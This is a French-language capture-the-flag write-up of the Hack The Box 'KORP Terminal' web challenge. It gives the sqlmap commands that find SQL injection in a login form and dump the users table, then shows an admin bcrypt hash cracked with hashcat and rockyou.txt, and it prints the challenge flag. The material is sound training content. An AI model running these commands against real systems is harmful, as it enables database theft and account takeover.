KORP Terminal
Catégorie: Web Difficulté: very-easy Flag: HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}
Challenge
Description
Your faction must infiltrate the KORPâą terminal and gain access to the Legionaries' privileged information and find out more about the organizers of the Fray. The terminal login screen is protected by state-of-the-art encryption and security protocols.
Ce challenge tourne sur un docker, disponible sur Github
Analyse du site
Le site se compose uniquement dâun formulaire qui est envoyĂ© en POST avec les paramĂštres username
et password
. On peut lancer un sqlmap dessus pour voir si une injection est détectée

$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username,password" --method POST --ignore-code 401 --batch
[...]
[22:26:14] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[22:26:15] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[22:26:15] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[22:26:16] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[22:26:17] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[22:26:17] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[22:26:18] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[22:26:19] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[22:26:20] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[22:26:20] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
POST parameter 'username' is vulnerable.
Exploitation de lâinjection SQL
Le paramĂštre username
est vulnérable, on va pouvoir tenter de dump la base de données
$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username" --method POST --ignore-code 401 --dbs --batch
available databases [3]:
[*] information_schema
[*] korp_terminal
[*] test
On y trouve la database korp_terminal
$ sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username" --method POST --ignore-code 401 -D korp_terminal --tables --batch
Database: korp_terminal
[1 table]
+-------+
| users |
+-------+
Celle-ci est composĂ© dâune seule table : users
sqlmap -u "http://94.237.49.166:54366" --data "username=1&password=2" -p "username" --method POST --ignore-code 401 -D korp_terminal -T users --dump --batch
Database: korp_terminal
Table: users
[1 entry]
+----+--------------------------------------------------------------+----------+
| id | password | username |
+----+--------------------------------------------------------------+----------+
| 1 | $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. | admin |
+----+--------------------------------------------------------------+----------+
On y trouve 1 compte : admin
Le mot de passe est visiblement hashĂ©, mĂȘme si lâon reconnaĂźt le bcrypt on va passer par hashcat pour lâidentifier Ă coup sĂ»r puis on en profitera pour essayer de le casser
Cassage du hash
Préalablement on enregistre le mot de passe dans un fichier, ici nommé hashes.txt
Jâutilise la wordlist rockyou.txt
pour tenter de le casser
$ hashcat hashes.txt
The following 4 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
On ne sâĂ©tait pas trompĂ©, câest bien du bcrypt, passons au bruteforce
$ hashcat hashes.txt -m 3200 rockyout.txt
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache built:
* Filename..: ../rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec
$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Et voilĂ , notre mot de passe : password123
Récupération du flag
Maintenant il est possible de se connecter avec admin:password123

DerniĂšre mise Ă jour
Cet article vous a-t-il été utile ?